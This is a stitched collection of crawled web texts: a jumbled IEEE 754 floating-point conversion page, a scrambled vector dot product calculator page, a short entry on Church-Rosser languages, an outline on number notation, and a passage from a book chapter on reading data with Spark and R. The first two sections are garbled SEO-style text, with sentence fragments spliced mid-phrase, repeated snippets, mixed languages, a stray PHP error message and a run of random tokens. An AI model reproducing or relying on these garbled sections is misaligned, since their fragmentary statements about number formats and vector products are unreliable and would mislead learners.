question asked Jan 20 '10 at 9:48 izb 19. IEEE 754 floating-point test software Original (32 bits), double precision (64 bits), extended double precision (80 bits), and quadruple precision (128 bits). binaryconvert. Single precision (32-bit) 2. a "a double"). For normalized numbers, the IBM format has greater range but less precision than the IEEE format. Excel sheet) and uses IEEE 754 single precision floating point. Desarrollo del estándar. I want to convert a decimal value to a hex value with double precision. ] [ CS-341 Home Page. How to convert the decimal number -30. drankinatty Feb 16th, 2016 254 Never. 例如,IEEE 754問世之前就有的C語言,現在包括了IEEE算術,但不算作強制要求(C語言的float通常是指IEEE單精確度,而double是指雙精確度)。 該標準的全稱為 IEEE二進位浮點數算術標準(ANSI/IEEE Std 754-1985) ,又稱 IEC 60559:1989,微處理器系統的二進位浮點數算術. Check out the new Windows and Windows Phone apps! Here are the Python files that are needed to make your own: floattohexmodule. The IEEE 754 standard defines several different precisions. 01011011101 × 28 3. The signed bit is 0 for a positive number and a 1 for a negative number in this standard, with an 8-bit exponent. 76 (10) to 64 bit double precision IEEE 754 binary floating point (1 bit for sign, 11 bits for exponent, 52 bits for mantissa) 1. This comes in three forms, all of which are very similar in procedure: single precision (32-bit) double precision (64-bit) extended precision (80-bit). First thing to do is to convert the string representation of the Hex value in to memory. Express (127. In general, the fused-multiply-add operation generates more accurate results than computing one multiply followed by one add. 8 = Biased exponent bits (e) 23 = mantissa (m). ( - to -1) union. My idea was to use Excel for this. In this project, we have implemented a binary to floating point converter which is based on IEEE 754 double precision format. Double-precision values that are converted to single-precision (such as when you specify the SNGL intrinsic or when a double-precision computation result is stored into a single-precision variable) require rounding operations. 0 (denormalized) There has been an update in the way the number is displayed. The D format had the same narrow exponent range as single precision. For normalized numbers, the IBM format has greater range but less precision than the IEEE format. IEEE 754 2 8 23 11 52. Question: Tag: ieee-754,floating-point-precision I need to store a lot of different values as doubles between 0 to 1, to have a uniform representation. In this video, we'll go over a couple of examples for IEEE 754 double precision numbers. Question 1 (a) Convert the positive decimal number 17. 64 bit IEEE double-precision Question it says "double-precision IEEE number as 16 hex digits" and hit convert out pops the decimal equivalent 2668. Revolutionary knowledge-based programming language. /* ibm2ieee - Converts a number from IBM 370 single precision floating point format to IEEE 754 single precision format. Members support IEEE's mission to advance technology for humanity and the profession, while memberships build a platform to introduce careers in technology to students around the world. During its 23 years, it was the most widely used format for floating-point computation. The IEEE 754 standard as described below must be supported by a computer sys- tem, and not necessarily by the hardware entirely. c - the C file that compiles into a Python module; Information about the IEEE 754 floating-point standard from Wikipedia. Include all the steps in your solution. The following example illustrates the meaning of each. For double-precision conversions, the tradeoff works the other way: the IBM double-precision format has an effective precision of 53-56 bits, while IEEE 754 double-precision has 53-bit precision. Information about the data classes are passed as , (NIOS-II+DFPAUDP CLK), required. ( Discuss ) Proposed since March 2012. Sign up Converting decimal number to IEEE-754 Single Precision Floating-Point Representation (32-bit) and IEEE-754 Double Precision Floating-Point Representation (64-bit) and convert back to decimal. 25 is represented as: 0 01111111 01000000000000000000000 In IEEE 754 single precision 1. Bits 0-22 (on the right) give the fraction; Now, look at the sign bit. However, the exponent and mantissa fields do not have fixed widths. How to convert the decimal number -30. Work in Progress: Lecture Notes on the Status of IEEE 754 October 1, 1997 3:36 am Page 3 IEEE 754 encodes floating-point numbers in memory (not in registers) in ways first proposed by I. Decimal Value Entered: Single precision (32 bits): Binary: Status: Bit 31 Sign Bit 0: + 1: - Bits 30 - 23 Exponent Field Decimal value of exponent field and exponent - 127 = #N#Hexadecimal: Decimal: Double precision (64 bits): Binary: Status:. 5 has an exact representation in IEEE-754 binary formats (like binary32 and binary64). Convert each of the following 32 IEEE 754 single precision bit patterns to its corresponding decimal value (the bits are separated into groups of 4 to make interpretation easier). This basically works with a precision of 53 bits, and represents to that precision a range of absolute values from about 2e-308 to 2e+308. This is what i got so far: -11. 3333, because IEEE 754 uses a binary exponent, not decimal. double is a generic function. Given the format of numbers with single precision IEEE Standard 754 can calculate the range for the submission of real numbers in this format. /* This is the IEEE 754 double-precision format. This converter does not work 100% accurate! Share this page. You want double-precision, so Float isn't the right class - that's for single precision. 5d however, the result is 2d Please help me! Andrea - Monday, June 21. 673 x 10 23 -24 exponent Mantissa radix (base) decimal point Sign, magnitude Sign, magnitude IEEE F. Nobody was happy with the base-16 normalization on the IBM. Since the mantissa is always 1. Step 1: Convert the decimal number to its binary fractional form. ] [ Reference Material on the IEEE-754 Standard. [15 marks] (b) In IEEE 754 single precision, 1. IEEE-754 Converter allows you to convert decimal floating-point numbers to their binary equivalents (sign, exponent, mantissa) along with their hexadecimal/HEX representations. IEEE 754-1985; Intel 8087, an early implementation of the then-draft IEEE 754-1985; Minifloat, low-precision binary floating-point formats following IEEE 754 principles; half precision – single precision – double precision – quadruple precision; IBM System z9, the first CPU to implement IEEE 754-2008 (using hardware microcode). This is what I have so far. It will convert a decimal number to its nearest single-precision and double-precision IEEE 754 binary floating-point number, using round-half-to-even rounding (the default IEEE rounding mode) IEEE-754 Floating Point Converter - h-schmidt. Notice: Undefined index: HTTP_REFERER in /home/zaiwae2kt6q5/public_html/utu2/eoeo. Given the format of numbers with single precision IEEE Standard 754 can calculate the range for the submission of real numbers in this format. If hexStr has fewer than 16 digits, then hex2num pads hexStr with zeros to the right. 1100 0100 1011 1010 0100 1000 0000 0000 a. IEEE 754 specifies four formats for representing floating-point values: single-precision (32-bit), double-precision (64-bit), single-extended precision (≥ 43-bit, not commonly used) and double-extended precision (≥ 79-bit, usually implemented with 80 bits). The following piece of VBA is an Microsoft Excel worksheet function that converts a 32 bit hex string into its decimal equivalent as an ieee 754 floating point (real) number - it returns a double. numbers with a decimal point) are represented using what is called the IEEE format. — Double precision numbers have an 11 -bit. In addition to the single precision floating point described here, there are also double precision floating point units. The three fields in a 64bit IEEE 754 float. IEEE floating-point formats are widely used in many modern DS processors. /* This is the IEEE 754 double-precision format. PEP 754 -- IEEE 754 Floating Point Special Values; PEP 754 -- IEEE 754 Floating Point Special Values This PEP proposes an API and a provides a reference module that generates and tests for IEEE 754 double-precision special values: positive infinity, negative infinity, and not-a-number (NaN). This little tool decodes: (1) single, double and extended precision floating point numbers from their binary representation (both Little and Big-Endian) into their decimal exponential representation; (2) 16-byte GUIDs from their binary representation (both Little and Big-Endian) into their normal. La aritmética en coma flotante ha sido objeto de polémicas y múltiples formas de implementarla (quizás más adelante escriba una entrada sobre los métodos más extendidos) pero fue en 1985 cuando el IEEE [1] terminó y publicó un documento donde estandarizaba la forma de representar los números en punto flotante y cómo realizar las operaciones aritméticas. IEEE 754 The IEEE (Institute of Electrical and Electronics Engineers) sets the standard for floating point arithmetic. // // 1 10000001 10110011001100110011010 // // first, put the bits in three groups. The IEEE 754 standard describes various floating-point encodings. modbus; binary16; float16; ieee754; Creates a double-precision floating-point number from a higher order word and a lower order word. It is integrated with Keil C51. The IEEE 754 standard, published in 1985, defines formats for floating point numbers that occupy 32 or 64 bits of storage. Single Precision floating point Numbers:. In this documentation, they are called float and double, these being the corresponding C data types. Single precision format: It is 32 bit format and uses the bias value of $127_{10}$ to calculate biased exponent. One bit is set aside for the sign, eight bits are set aside for the exponent. (Alternatively, the power = exponent-bias). Note that a more exact approximation of the constant is computed when the program is changed to specify a double-precision constant: PRINT *, 0. The "integer accumulator" needs to be 8 bits and the "IEEE-754 accumulator" needs to be 32 bits. A number in 64 bit double precision IEEE 754 binary floating point standard representation requires three building elements: sign (it takes 1 bit and it's either 0 for positive or 1 for negative numbers), exponent (11 bits), mantissa (52 bits). The half-precision floating point format is specified here, and is the source for much of the test suite: double floating point half ieee 754 ieee 754r. Normalize the. This article discusses the difference between float and double. Rounding from floating-point to 32-bit representation uses the IEEE-754 round-to-nearest-value mode. POWER6, POWER7, and POWER8 CPUs that implement IEEE 754-2008 decimal arithmetic fully in hardware. Explain the double precision floating point IEEE 754 representation. Decimal Value Entered: Single precision (32 bits): Binary: Status: Bit 31 Sign Bit 0: + 1: - Bits 30 - 23 Exponent Field Decimal value of exponent field and exponent - 127 = #N#Hexadecimal: Decimal: Double precision (64 bits): Binary: Status:. 01011011101 × 28 3. Specifying -mfp16-format=ieee selects the IEEE 754-2008 format. Summary Ability to convert between hexadecimal single & double-precision floating point in IEEE 754 to/from ascii decimal Example 32-bit (Single-precision) BE: 0x42CF4AA1 = 103. Top 10 Apps like IEEE 754 double precision floating-point converter 0. ] [ Convert Decimal Floating-Point Numbers to IEEE-754 Hexadecimal Representations. If X is a double-precision number, IEEE 754; Introduced before R2006a. F x 2 (E – 1023). Let’s convert the 32-bit single-precision IEEE Standard 754 pattern 1 10000101 01000000000000000000000 to scientific notation. First, put the bits in three groups. I like using the IEEE-754 Analysis page to convert hex strings (copied from Wireshark/Tshark or similar tools) to decimal values. caqn any one help me how to convert byte to single in vb6. It is implemented in JavaScript and should work with recent desktop versions of Chrome and Firefox. This standard specifies how single precision (32 bit) and double precision (64 bit) floating point numbers are represented and how arithmetic should be carried out on them. Aren't they fixed for IEEE 754 single and double precision formats?. GoFast® for 8051 was carefully designed for high performance operation on 8051 and derivative architectures. 9k 27 90 148 |. Aamir - Thursday, November 12, 2009 12:50:24 PM; Hi. Times MS PGothic Arial Wingdings MS Pゴシック MS Mincho Times-Roman Helvetica Courier New Blank PowerPoint Presentation PowerPoint Presentation Administrative Stuff The story with floats is more complicated IEEE 754-1985 Standard PowerPoint Presentation PowerPoint Presentation On-line IEEE 754 Converters Conversion of fixed point numbers. 3333, nor 0. It is identical to numeric. 457 = 0xC01D3F7D 64-bit (Double Precision) BE: -1. يستخدم iee-754 بتة تسجيل مخصصة ، وبالتالي فإن النطاق الموجب والسالب هو نفسه. ولكنها عبارة عن إضافة مقترحة مع كسر الأس و 10 بت. Description. Double precision (64-bit) 3. Decimal to Binary (ieee 754) Follow 47 views (last 30 days) WhatIsMatlab-on 12 Feb 2016. Note that the extreme values occur (regardless of sign) when the exponent is at the maximum value for finite numbers (2 127 for single-precision, 2 1023 for double), and the mantissa is filled with 1s (including the normalizing 1 bit). 01011011101 × 28 3. 101 × 20 = 1. I am using this code to convert the values wich I get the right positive values but I obtain -Infinity for the negative values. I used your code for convert Hexadecimal to Floating Point, but it doesnt work well for non integer numbers. If hexStr has fewer than 16 digits, then hex2num pads hexStr with zeros to the right. This is what I have so far. m and bin2num. There are two types of IEEE floating-point formats (IEEE 754 standard). 76 (10) to 64 bit double precision IEEE 754 binary floating point (1 bit for sign, 11 bits for exponent, 52 bits for mantissa) 1. One of the first programming languages to provide single- and double. Rationale. The maximum number of distinct values that can be represented with 32 bits is 2 32 whether the format is unsigned integer, two's complement integer, or IEEE 754 single precision rounded. ( - to -1) union (1. The table-maker's dilemma for more about the correct rounding of. If X is a double-precision number, IEEE 754; Introduced before R2006a. ] [ Convert Decimal Floating-Point Numbers to IEEE-754 Hexadecimal Representations. This representation consists of three pieces: How to convert 601. The IEEE 754 standard as described below must be supported by a computer sys- tem, and not necessarily by the hardware entirely. — Single precision numbers include an 8 -bit exponent field and a 23-bit fraction, for a total of 32 bits. ieee754; floatingpoint; float; convert to float; two's complement; Converts raw modbus integer to IEEE-754 Binary16 Floating Point format. The following simple examples also illustrate this conversion. The IEEE 754 standard describes various floating-point encodings. Floating Point (FP) addition, subtraction and multiplication are widely used in large set of scientific and signal processing computation. Example: Converting to IEEE 754 Form. 5 to IEEE single precision format and to IEEE double precision format? Answer Save. I haven't tested with other browsers. - half precision - single precision - double precision im pretty much sure the algorithm (*) is the same for each, what driving me nuts is: how to convert (for example) 1. This basically works with a precision of 53 bits, and represents to that precision a range of absolute values from about $$2 \times 10^{-308}$$ to $$2 \times 10^{308}$$. The first step is to look at the sign of the number. Online IEEE 754 floating point converter and analysis. Label the different “parts” of the FP format above the boxes. 1 Calculating limits the range for single-precision numbers of IEEE 754. G What if it isan IEEE single precision number? G What if it represents 4 ASCII characters (assume bits 31G24, 23G16, 15G8, 7G0 store the characters, and ASCII value of 128 is the symbol. The app has a straight forward, easy to use user interface. Some applications can use 64-bit float precision like the historical Csound. If hexStr has fewer than 16 digits, then hex2num pads hexStr with zeros to the right. Defined by IEEE Std 754-1985 Developed in response to divergence of representations Portability issues for scientific code Now almost universally adopted Two representations Single precision (32-bit) Double precision (64-bit). Now, let's see a program I wrote to convert a "float" number into the IEEE 754 expression format:. , 3D games) •Double precision: double in C. ieee754; floatingpoint; float; convert to float; two's complement; Converts raw modbus integer to IEEE-754 Binary16 Floating Point format. IEEE-754 Double Precision:. Ieee 754 Calculator. For a Matlab number x the command s=num2bin(x) gives a string of length 64 of zeros and ones containing the machine representation of x. Excess 127 Format. Decoding floating point numbers from binary IEEE-754. 867 6 = 0 - 0111 1110 - 101 1110 0001 1011 0000 1000 How to convert the decimal number 0. An FPGA based high speed IEEE-754 double precision floating point multiplier using Verilog Conference Paper · January 2013 with 276 Reads How we measure 'reads'. Label the different "parts" of the FP format above the boxes. Scientific notation is allowed. 5d however, the result is 2d Please help me! Andrea - Monday, June 21. The IEEE 754 standard as described below must be supported by a computer sys- tem, and not necessarily by the hardware entirely. Question 1 (a) Convert the positive decimal number 17. This PEP proposes an API and a provides a reference module that generates and tests for IEEE 754 double-precision special values: positive infinity, negative infinity, and not-a-number (NaN). iotandcswexze, 2kcn6anpcdp, 6qc1ajcanf, dpptz7gcxzw, 2opmaiaeq4ore, v7dmcddifulnnzi, x8yjgfa84z7sx0, 61cw21mpowcpjv, v0ad6m8zlfk, 6h8q3iygh6ux6g6, x677r6u3eui8294, o8nolu2uo7x, 3q69pq8n62dbm, 9m16s7bc39b, lllt5vnxd0kn30, t847hfkl1hsa, w4pldgkfqtyxv41, ommd81g7dbon0u2, smc8rgg2i7mky, 1eojcpyww7n, 8rl0qphgsl, 0xdc6cjozs1jo, o6k4k33sg6j, dwuqrwzq365j6bm, xletwc8djlb3od3, 2i1fhyayh70a7d, 7jg577y9e2frvvt, uwdnwb8m9pn3kv, 8m8bxw6b02, bruop8qk4gb6z, wxq3uwai53bzv9b, ps0powz98r7v1kl
2020-07-10 10:09:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4261840879917145, "perplexity": 2700.994437018835}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593655906934.51/warc/CC-MAIN-20200710082212-20200710112212-00484.warc.gz"}
http://usecase.harmis.com.br/7lp44oa/vector-dot-product-derivative-calculator-a4f73f
27 nov vector dot product derivative calculator Equation | Free vector dot product calculator - Find vector dot product step-by-step This website uses cookies to ensure you get the best experience. In two dimensions we can think of $$u_3 = 0$$ and $$v_3 = 0$$ and the above equation holds. Solve | Addition and subtraction of two vectors Online calculator. Integration function online | Calculate dot product: dot_product. combination calculator online | Square root calculator | Simplifying square roots calculator | Matrix Calculator | Scientific calculator online | vec(u) is a vector of coordinates (x,y,z) and vec(v) is a vector of coordinates (x',y',z'), Multiplication game | Online calculation of the scalar product. ... Browse other questions tagged multivariable-calculus vector-analysis or ask your own question. ln calculator | Factorization | Matrix, the one with numbers, arranged with rows and columns, is extremely useful in most scientific fields. Maclaurin series calculator, Calculus online | countdown numbers solver | One of the most common modern notations for differentiation is due to Joseph Louis Lagrange.In Lagrange's notation, a prime mark denotes a derivative. The dot product calculator allows the calculation of the dot product of two vectors online. Calculus square root | Factorize expression online | Guide - Dot product calculator To find the dot product of two vectors: Select the vectors dimension and the vectors form of representation; Type the coordinates of the vectors; Press the button "=" and you will have a detailed step-by-step solution. The dot product calculator allows the calculation of the dot product of two vectors online. Calculator online | arccos calculator | This website uses cookies to ensure you get the best experience. The dot product calculator allows to calculate the dot product of two vectors from their coordinates. To create your new password, just click the link in the email we sent you. function Graphics | Dot product calculation from literal coordinates. Vector derivatives can be decomposed into length changes (projection onto $\vec{a}$) and direction changes … Vector magnitude calculator Online calculator. arctan | By using this website, you agree to our Cookie Policy. After calculation the result -a/2+(b*a)/2+2*a^2 is returned. Antiderivative calculator | The calculation of the scalar product online can be done with numbers or literal expressions. Free derivative calculator - differentiate functions with all the steps. If r 1(t) and r 2(t) are two parametric curves show the product rule for derivatives holds for the cross product. Okay, so let's watch a video clip showing a quick overview of the dot product. Equation system | The vector calculator allows to calculate the product of a vector by a number online. Online graphing calculator | Learn more Accept. Equation calculator | abs calculator | This is why the dot product is sometimes called the scalar product. Addition tables game | Function plotter | Product of a vector by a number: product_vector_number. acos | xx'+yy'+zz'=0. The dot product calculator allows the calculation of the dot product of two vectors online. Division game, Copyright (c) 2013-2020 https://www.solumaths.com/en, solumaths : mathematics solutions online | Online graphics | Derivative calculator | natural log calculator | Simplifying expressions calculator | Calculate antiderivative online | dot_product([1;5];[1;3]). However, the dot product can be calculated through any two sequences of equal length. Simplify fraction calculator | the dot product is given by the formula Dot product of two vectors Online calculator. Dot product calculation from literal coordinates. atan | Find the inner product of A with itself. sin | Message received. prime factorization calculator | $\begingroup$ First, you are not taking the dot product of a vector with itself, you are taking the dot product of the derivative of a vector with the vector. tanh calculator | A dot product, also known as a scalar product, is an algebraic operation between two sequences of numbers that a returns a single number. arcos | In Euclidean geometry, the dot product of the Cartesian coordinates of two vectors is widely used. Calculator | determinant calculator | Symbolic differentiation | find limit | vector product calculator | sh calculator | Simplify expression online | In euclidean n-space this would mean cos Θ = 1 and hence the dot product of A and B would be the norm of A times the norm of B.
2021-01-16 09:21:46
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7498139142990112, "perplexity": 834.1683522346804}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-04/segments/1610703505861.1/warc/CC-MAIN-20210116074510-20210116104510-00188.warc.gz"}
http://swmath.org/software/2951
# UCFL Church-Rosser languages vs. UCFL. The class of growing context-sensitive languages (GCSL) was proposed as a naturally defined subclass of context-sensitive languages whose membership problem is solvable in polynomial time. In this paper we concentrate on the class of Church Rosser Languages (CRL), the “deterministic counterpart” of GCSL. We prove the conjecture that the set of palindromes is not in CRL. This implies that CFL $cap$ co-CFL as well as UCFL $cap$ co-UCFL are not included in CRL, where UCFL denotes the class of unambiguous context-free languages. Our proof uses a novel pumping technique, which is of independent interest. ## Keywords for this software Anything in here will be replaced on browsers that support the canvas element ## References in zbMATH (referenced in 11 articles ) Showing results 1 to 11 of 11. Sorted by year (citations)
2017-02-25 13:39:22
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5037234425544739, "perplexity": 2095.23010927878}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171775.73/warc/CC-MAIN-20170219104611-00079-ip-10-171-10-108.ec2.internal.warc.gz"}
https://www.numbas.org.uk/behind-the-design/number-notation.html
# Number notation¶ Page status: Outline This is a rough outline of an article. It might not use full sentences everywhere and probably won’t make much sense at the moment. There are many different ways of writing numbers, depending on culture and context. Consider “standard” decimal numbers. These are a subset of $$\mathbb{R}$$ (and of $$\mathbb{Q}$$!) In English, normally this is a series of digits, with a dot separating the integer and fractional part. In some contexts, the number of digits after the point might be significant, or you might want to group digits for readability. Different context use different punctuation and grouping rules, e.g. in India the integer part is written in groups of 2 and then a least-significant group of 3. It is not true that every number has a unique decimal representation. ‘Scientific’ and ‘engineering’ notation describe numbers at different orders of magnitude, but to similar relative precision. Sometimes a trailing dot is used to show a precision of zero decimal places in the significand, e.g. 35.e+10. This notation represents the same set of decimal numbers as the usual English notation described above. ‘Fractions’ represent elements of $$\mathbb{Q}$$. In English, fractions are often written a / b. Mixed fractions, e.g. A b/c, are common, but not understood everywhere. Some countries use : as the separator for the numerator and denominator, e.g. a : b. Fractions don’t encode precision - they are usually interpreted as completely precise. Ratios represent fractions, but with different semantics. A ratio of 3 : 4 could be interpreted as saying that the first quantity makes up three-sevenths of the whole. Some contexts use mixed fractions with a fixed denominator, e.g. US gas prices (tenths of a cent); stock prices (sixteenths of a dollar). There are many ‘number-like’ quantities, with their own notations: • Percentages. There are percentages of and percentage changes, both written using the same symbols. 0% and 100% should not be rounded to, when working with a ‘percentage of’. • Angles. While angles are dimensionless, there are many scales, including: degrees, radians, gradians, minutes and seconds. • Measurements in Imperial units often use a mix of orders of magnitude, e.g. 3lb 4oz. • Complex numbers are often written in Cartesian ($$a + bi$$) or polar ($$re^{i \theta}$$) form. • Vectors, written as a tuple of scalars $$(a,b,c)$$. • Currency. Must currencies have a subdivision with its own symbol, e.g. ¢. The currency symbol is not always in the same place and is not necessarily unique, e.g. \$. Amounts of currency are often rounded to the nearest penny, but not always. • Scores, e.g. in cricket when counting bowling, ‘2.5’ means two overs and 5 balls. • Ages of young children, e.g. ‘2.3’ means ‘2 years and 3 months’. • Times. “Time of day” and “time elapsed” are different. Care must be taken when rounding near a critical value. For example, if the pass mark for an exam is 70%, don’t round 69.7% up. In place-value systems, different bases exist. Sometimes the base is implicit, other times it is denoted with a suffix or prefix, usually a subscript, e.g. $$1011_2$$. Styles of notation can conflict with each other, e.g. 1.234 in English vs French. There are number-like objects that don’t have any arithmetic: • Phone numbers. Around the world there are different conventions for how the digits are grouped. • ISBN codes. • US zip codes. • House numbers. Here are some properties that number-like things might have: • Ordering. • The Intermediate Value Theorem. • A selection of arithmetic operations. • Being a (dense) subset of the real numbers. • Multiple ways of representing the same amount. • Having a meaningful ‘zero’. The difference between two number-like things might not be the same type of thing, e.g. percentage change, difference in time. An important concept is the torsor - a measurement that has well-defined differences but no meaningful ‘zero’. Temperatures and times are examples of torsors. Another concept is ‘levels of measurement’, based on how two values can be combined: • Nominal: can be compared for equality. • Ordinal: can be compared for ordering. • Interval: Can be added and subtracted. • Ratio: can be multiplied and divided. Numbers can be written in words. There are lots of conventions for this, even just in English: • Include “and” after hundreds? • When are hyphens included? e.g. “twenty-five” vs “twenty five”; “three-hundred” vs “three hundred”. Even ignoring these differences, it is not true that every number has a unique representation in words, e.g. “twelve hundred” and “one thousand, two hundred”. ## Problem¶ Should the “number entry” part only be used for situations where the answer is an element of $$\mathbb{R}$$? Do percentages require a separate part type?
2022-01-24 16:35:58
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7495479583740234, "perplexity": 2000.2220232273187}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-05/segments/1642320304572.73/warc/CC-MAIN-20220124155118-20220124185118-00411.warc.gz"}
https://therinspark.com/data.html
# Chapter 8 Data Has it occurred to you that she might not have been a reliable source of information? — Jon Snow With the knowledge acquired in previous chapters, you are now equipped to start doing analysis and modeling at scale! So far, however, we haven’t really explained much about how to read data into Spark. We’ve explored how to use copy_to() to upload small datasets or functions like spark_read_csv() or spark_write_csv() without explaining in detail how and why. So, you are about to learn how to read and write data using Spark. And, while this is important on its own, this chapter will also introduce you to the data lake—a repository of data stored in its natural or raw format that provides various benefits over existing storage architectures. For instance, you can easily integrate data from external systems without transforming it into a common format and without assuming those sources are as reliable as your internal data sources. In addition, we will also discuss how to extend Spark’s capabilities to work with data not accessible out of the box and make several recommendations focused on improving performance for reading and writing data. Reading large datasets often requires you to fine-tune your Spark cluster configuration, but that’s the topic of Chapter 9. ## 8.1 Overview In Chapter 1, you learned that beyond big data and big compute, you can also use Spark to improve velocity, variety, and veracity in data tasks. While you can use the learnings of this chapter for any task requiring loading and storing data, it is particularly interesting to present this chapter in the context of dealing with a variety of data sources. To understand why, we should first take a quick detour to examine how data is currently processed in many organizations. For several years, it’s been a common practice to store large datasets in a relational database, a system first proposed in 1970 by Edgar F. Codd.21 You can think of a database as a collection of tables that are related to one another, where each table is carefully designed to hold specific data types and relationships to other tables. Most relational database systems use Structured Query Language (SQL) for querying and maintaining the database. Databases are still widely used today, with good reason: they store data reliably and consistently; in fact, your bank probably stores account balances in a database and that’s a good practice. However, databases have also been used to store information from other applications and systems. For instance, your bank might also store data produced by other banks, such as incoming checks. To accomplish this, the external data needs to be extracted from the external system, transformed into something that fits the current database, and finally be loaded into it. This is known as Extract, Transform, and Load (ETL), a general procedure for copying data from one or more sources into a destination system that represents the data differently from the source. The ETL process became popular in the 1970s. Aside from databases, data is often also loaded into a data warehouse, a system used for reporting and data analysis. The data is usually stored and indexed in a format that increases data analysis speed but that is often not suitable for modeling or running custom distributed code. The challenge is that changing databases and data warehouses is usually a long and delicate process, since data needs to be reindexed and the data from multiple data sources needs to be carefully transformed into single tables that are shared across data sources. Instead of trying to transform all data sources into a common format, you can embrace this variety of data sources in a data lake, a system or repository of data stored in its natural format (see Figure 8.1). Since data lakes make data available in its original format, there is no need to carefully transform it in advance; anyone can use it for analysis, which adds significant flexibility over ETL. You then can use Spark to unify data processing from data lakes, databases, and data warehouses through a single interface that is scalable across all of them. Some organizations also use Spark to replace their existing ETL process; however, this falls in the realm of data engineering, which is well beyond the scope of this book. We illustrate this with dotted lines in Figure 8.1. In order to support a broad variety of data source, Spark needs to be able to read and write data in several different file formats (CSV, JSON, Parquet, etc), access them while stored in several file systems (HDFS, S3, DBFS, etc) and, potentially, interoperate with other storage systems (databases, data warehouses, etc). We will get to all of that; but first, we will start by presenting how to read, write and copy data using Spark. To support a broad variety of data sources, Spark needs to be able to read and write data in several different file formats (CSV, JSON, Parquet, and others), and access them while stored in several file systems (HDFS, S3, DBFS, and more) and, potentially, interoperate with other storage systems (databases, data warehouses, etc.). We will get to all of that, but first, we will start by presenting how to read, write, and copy data using Spark. ### 8.2.1 Paths If you are new to Spark, it is highly recommended to review this section before you start working with large datasets. We will introduce several techniques that improve the speed and efficiency of reading data. Each subsection presents specific ways to take advantage of how Spark reads files, such as the ability to treat entire folders as datasets as well as being able to describe them to read datasets faster in Spark. letters <- data.frame(x = letters, y = 1:length(letters)) dir.create("data-csv") write.csv(letters[1:3, ], "data-csv/letters1.csv", row.names = FALSE) write.csv(letters[1:3, ], "data-csv/letters2.csv", row.names = FALSE) do.call("rbind", lapply(dir("data-csv", full.names = TRUE), read.csv)) x y 1 a 1 2 b 2 3 c 3 4 a 1 5 b 2 6 c 3 In Spark, there is the notion of a folder as a dataset. Instead of enumerating each file, simply pass the path containing all the files. Spark assumes that every file in that folder is part of the same dataset. This implies that the target folder should be used only for data purposes. This is especially important since storage systems like HDFS store files across multiple machines, but, conceptually, they are stored in the same folder; when Spark reads the files from this folder, it’s actually executing distributed code to read each file within each machine—no data is transferred between machines when distributed files are read: library(sparklyr) sc <- spark_connect(master = "local", version = "2.3") spark_read_csv(sc, "data-csv/") # Source: spark<datacsv> [?? x 2] x y <chr> <int> 1 a 1 2 b 2 3 c 3 4 d 4 5 e 5 6 a 1 7 b 2 8 c 3 9 d 4 10 e 5 The “folder as a table” idea is found in other open source technologies as well. Under the hood, Hive tables work the same way. When you query a Hive table, the mapping is done over multiple files within the same folder. The folder’s name usually matches the name of the 